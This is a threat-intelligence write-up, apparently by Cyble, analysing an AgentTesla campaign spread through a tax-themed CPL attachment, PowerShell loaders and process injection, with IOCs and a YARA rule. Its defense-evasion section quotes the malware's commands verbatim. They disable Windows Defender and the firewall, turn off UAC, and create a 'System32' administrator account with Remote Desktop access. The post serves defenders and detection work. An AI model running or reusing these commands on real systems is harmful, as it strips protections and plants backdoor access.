AgentTesla Malware Targets Users with Malicious Control Panel File

Key Takeaways

  • The blog highlights a new infection chain for distributing AgenTesla RAT. It involves a spam email with a CPL file that, when executed, downloads a PowerShell script that injects AgentTesla malware in exe and MSbuild.exe.
  • The PowerShell scripts use obfuscated binary strings to hide malicious code.
  • For persistence, malicious VB Scripts are dropped at startup folders, and a new schedule task is created.
  • A .NET-based loader file is used to inject AgentTesla payload in the memory.

Executive Summary

Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).

The adversary leverages malicious CPL files to execute malicious PowerShell scripts and utilizes a custom obfuscated .NET loader to inject AgentTesla payload.

During the investigation, we discovered a malicious email with the subject Gorgees Ghada shared “” with you. This email contains an attached archive file, which includes two files, one PDF and another CPL file, namely Gorgees_Ghada_Tax 2021.pdf and Gorgees_Ghada_Tax 2021.cpl.

This CPL file executes a PowerShell script to download another file from the URL hxxp://cawp1[.]blogspot[.]com/atom.xml. This newly downloaded file contains a .NET loader injecting AgentTesla remote access trojan (RAT) into system processes.

The figure below shows the spam email.

Figure 1 – Spam Email

AgentTesla is a .NET-based information stealer that infiltrates computers and exfiltrates sensitive information. The main focus of the AgentTesla is credentials and personal information of victims. Additionally, Agent Tesla has capabilities such as keylogging, stealing clipboard data, file system access, and data exfiltration to the Command and Control (C&C) server.

Technical Details

The attack lifecycle comprises several distinct stages, each serving a specific purpose to achieve its goals. These stages encompass various techniques and methodologies to facilitate initial infection, establish persistence on the targeted system, evade detection by security measures, and employ process injection for further advancements.

The figure below shows the AgentTesla infection chain.

Figure 2 – AgentTesla Infection Chain

Initial Infection

The email attachment encompasses a malicious file named Gorgees_Ghada_Tax 2021.cpl. It is a CPL file. The SHA256 hash of this file is 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303.

During our analysis, merely three security vendors successfully detected this malicious file, as shown in the figure below.

Figure 3 – Anti Virus Vendor Detection for Malicious CPL File

The Gorgees_Ghada_Tax 2021.cpl file operates similarly to regular executables, requiring only a double-click to initiate its execution. Within this file lies PowerShell code, responsible for fetching a malicious PowerShell script from a hardcoded URL cawp1[.]blogspot[.]com/atom.xml and subsequently executing it through the use of powershell.exe.

The figure below shows the code for downloading and executing the script.

Figure 4 – PowerShell Code Executed by CPL

The Downloaded powershell script contains several obfuscated binary strings. Various binary substrings are replaced with special characters like ‘*’ and ‘_’ for obfuscation. Once the script is executed, PowerShell undertakes a deobfuscation process, replacing the special characters with their original binary substrings, thereby revealing the actual content of the binary strings. Subsequently, these deobfuscated binary strings are transformed into additional PowerShell scripts, an executable, and a DLL file.

The figure below shows the downloaded malicious script.

Figure 5 – Powershell Script Downloaded by the CPL File

After being executed, the malicious PowerShell script drops three scripts into the C:\ProgramData\phuddiupdate directory: AdobeUpdates.vbs, Clang.vbs, and Se**logy.!!!!!!!!!!!!!!!!. These scripts facilitate a series of malicious actions, which are elaborated on in the subsequent sections.

The figure below shows the files dropped by the malicious PowerShell script.

Figure 6 – Scripts Dropped by the Malicious Powershell Script

Payload Injection

Within the script “Se**logy.!!!!!!!!!!!!!!!!”, two binary string variables, namely “BigBOSS” and “s**ybunbun”, are concealed through obfuscation. The variable BigBOSS corresponds to an obfuscated AgentTesla executable, while the variable “s**ybunbun” conceals yet another obfuscated PowerShell script.

The figure below shows contents of “Se**logy.!!!!!!!!!!!!!!!!” file.

Figure 7 – Contents of the Dropped Sology.~!!!!!!!!!!!!!!!!~ File

Subsequently, the PowerShell script undertakes a deobfuscation process on the string variable “s**ybunbun” and executes the underlying PowerShell script. This deobfuscated script includes a loader DLL file based on .NET, which is once again concealed in binary string format. The script performs deobfuscation on the binary string, subsequently converting it into a byte array to get the actual loader.

The figure below shows the script code to create Byte Array from Binary String.

Figure 8 – Script to Deobfuscate .NET Loader

Upon generating the .NET loader binary, the script initializes a designated method, C, within namespace A and Class B of the .NET loader.

The figure below shows the method C of the .NET Loader DLL file.

Figure 9 – Method C of .NET Loader DLL

This DLL then engages in the process injection, which injects the AgentTesla executable into three distinct executables located at C:\Windows\Microsoft.NET\Framework: \v4.0.30319\RegSvcs.exe, \v2.0.50727\RegSvcs.exe, and \v3.5\Msbuild.exe.

This process injection is accomplished by utilizing the Invoke method within the script, as shown below.

Figure 10 – Script Performing Process Injection

The ultimate injected payload is a 32-bit variant of the AgentTesla malware, with a SHA256 hash of 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e.


The malware employs both scheduled tasks and the Startup folder in its attempts to establish persistence. Within the downloaded PowerShell script, the command “schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr “$KILKGGKGK C:\ProgramData\phuddiupdate\AdobeUpdates.vbs” is present. This command generates a scheduled task entry within the Task Scheduler. This entry outlines that the script AdobeUpdates.vbs located at C:\ProgramData\phuddiupdate will be executed on a daily basis without a specific end date.

The figure below shows the task scheduler entry.


Figure 11 – Task Scheduler Entry for Persistence

Furthermore, to enhance its persistence, the PowerShell script drops two scripts, AdobeUpdates.vbs, and Clang.vbs, into the system’s startup folder. The startup folder is scanned upon starting the operating system, and any files within it are executed as part of the initialization process.

The figure below shows the start-up folder.

Figure 12 – Startup Entry for Persistence

Both scripts, AdobeUpdates.vbs and Clang.vbs, share a common code, differing solely in their respective download URLs. Encapsulated within these scripts is a PowerShell command intended for execution. The VBScripts contain powershell command to download the malicious payload from the hardcoded URL every time the system starts or at the time mentioned in the Scheduled task entry.

The figure below shows the complete code of the AdobeUpdates.vbs.

Figure 13 – Contents of the AdobeUpdates.vbs Script

Defense Evasion

In order to evade detection mechanisms, the initial PowerShell script utilizes an encoded binary string variable named AMSISSISISI. Within this variable, two binary strings are embedded, accompanied by code that stops the Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).

The figure below shows the deobfuscated string AMSISSISISI.

Figure 14 – Script to Disable Windows Defender

The variable AMI is an AMSI bypass script that tries to disable AMSI’s “amsiInitFailed” check by manipulating non-public, static fields in the “System.Management.Automation.AmsiUtils” class.

The Figure below shows the powershell command to bypass AMSI.

Figure 15 – PowerShell for AMSI Bypass

Another variable, DEF, is a PowerShell script to manipulate windows defender settings. The script contains the exclusion of extensions, paths, processes, IPAddress, and other Windows Defender settings.

Excluded Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js.

Excluded Path: C:\, D:\ and E:\.

Excluded Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus and wscript.exe.

The script modifies the following windows defender settings to impair defense:

  • Add-MpPreference -ExclusionIpAddress
  • Add-MpPreference -ThreatIDDefaultAction_Actions 6
  • Add-MpPreference -AttackSurfaceReductionRules_Ids 0
  • Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  • Set-MpPreference -EnableControlledFolderAccess Disabled
  • Set-MpPreference -PUAProtection disable
  • Set-MpPreference -HighThreatDefaultAction 6 -Force
  • Set-MpPreference -ModerateThreatDefaultAction 6
  • Set-MpPreference -LowThreatDefaultAction 6
  • Set-MpPreference -SevereThreatDefaultAction 6
  • Set-MpPreference -ScanScheduleDay 8

Additionally, the script executes the following commands.

Command Description
New-Ipublicroperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force PowerShell command to disable User Account Control (UAC) on the system.
Stop-Service -Name WinDefend -Confirm:$false -Force PowerShell command forcefully stops the Windows Defender service without asking for confirmation and without waiting for dependent services or tasks to finish
Set-Service -Name WinDefend -StartupType Disabled Command prevents the WinDefend service from automatically starting when the system starts up.
net user System32 /add Command to create a new user account with the username “System32”
net user System32 123 Set the password for the user account with the username “System32” to “123”
net localgroup administrators System32 /add Add “System32” to the “Administrators” local group on the system.
net localgroup “Remote Desktop Users” System32 /add Add the account “System32” to the “Remote Desktop Users” local group on the system.
net stop WdNisSvc Stop Windows Defender Network Inspection Service WdNisSvc service
sc delete windefend Permanently delete the “windefend” service
netsh advfirewall set allprofiles state off Turn off the Windows Firewall for all network profiles on the system

The figure below shows the script to impair defense.

Figure 16 – Script Code to Manipulate Windows Defender Settings

The figure below shows the process tree of the AgentTesla Infection.

Figure 17 – AgentTesla Process Tree


The observed malware campaign demonstrates a sophisticated and multi-stage attack strategy. By disguising malicious content as a seemingly legitimate program, the adversaries aim to lure unsuspecting users into activating weaponized control panel files that execute PowerShell scripts and load the dangerous AgentTesla malware. The successful infiltration of AgentTesla allows attackers to conduct data theft and execute commands on compromised systems, posing significant security risks. Vigilance and robust security measures are imperative to combat this threat.

Our Recommendations

  • Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.
  • Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.

MITRE ATT&CK® Techniques

Tactic  Technique ID  Technique Name 
Initial Access T1566 Phishing
Execution T1059


Command and Scripting Interpreter

User Execution

Persistence T1547.001 


Startup Folder

Scheduled Task/Job: Scheduled Task

Defense Evasion T1140





Deobfuscate/Decode Files or Information

Impair Defenses: Disable or Modify Tools

Impair Defenses: Disable or Modify System Firewall

Impair Defenses: Indicator Blocking

Impair Defenses: Disable or Modify Cloud Firewall

Command and Control T1071 Application Layer Protocol

Indicators of Compromise (IOCs)

Indicators Indicator Type Details






Gorgees_Ghada_Tax 2022.cpl
cawp1[.]blogspot[.]com/atom.xml URL PowerShell script






























.NET loader

Yara Rules

rule AgentTesla_CPL_Downloader



author = “Cyble”

description = “Detects AgentTesla CPL Downloader Files”

date = “2023-08-08”

os = “Windows”

threat_name = “AgentTesla”

severity = 100

reference_sample = “72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303”


$a = “'”

$b = “-ExecutionPolicy Bypass -c \”%s\””

$c = “(‘{1}{0}’-f’calc’,’i’).replace(‘calc’,’eX’)”


all of them


Detection Guidance:

Due to its association with downloading harmful PowerShell code from the “” URL pattern, it is recommended to implement a security rule that halts the execution of the PowerShell.exe application in cases where the strings “'” and “.replace(‘calc’,’eX’)” are present in PowerShell command line. This restriction should be enforced exclusively when the origin of the PowerShell.exe process is traced back to rundll32.exe, with the rundll32.exe process initiated by control.exe

Disclaimer: The provided detection guidance rules are purely illustrative and should not be directly implemented in a production environment without proper testing, validation, and consideration of potential impacts on system performance and security. Always exercise caution when implementing security rules or policies, and ensure you fully understand the consequences of any changes made to your system or network.

Scroll to Top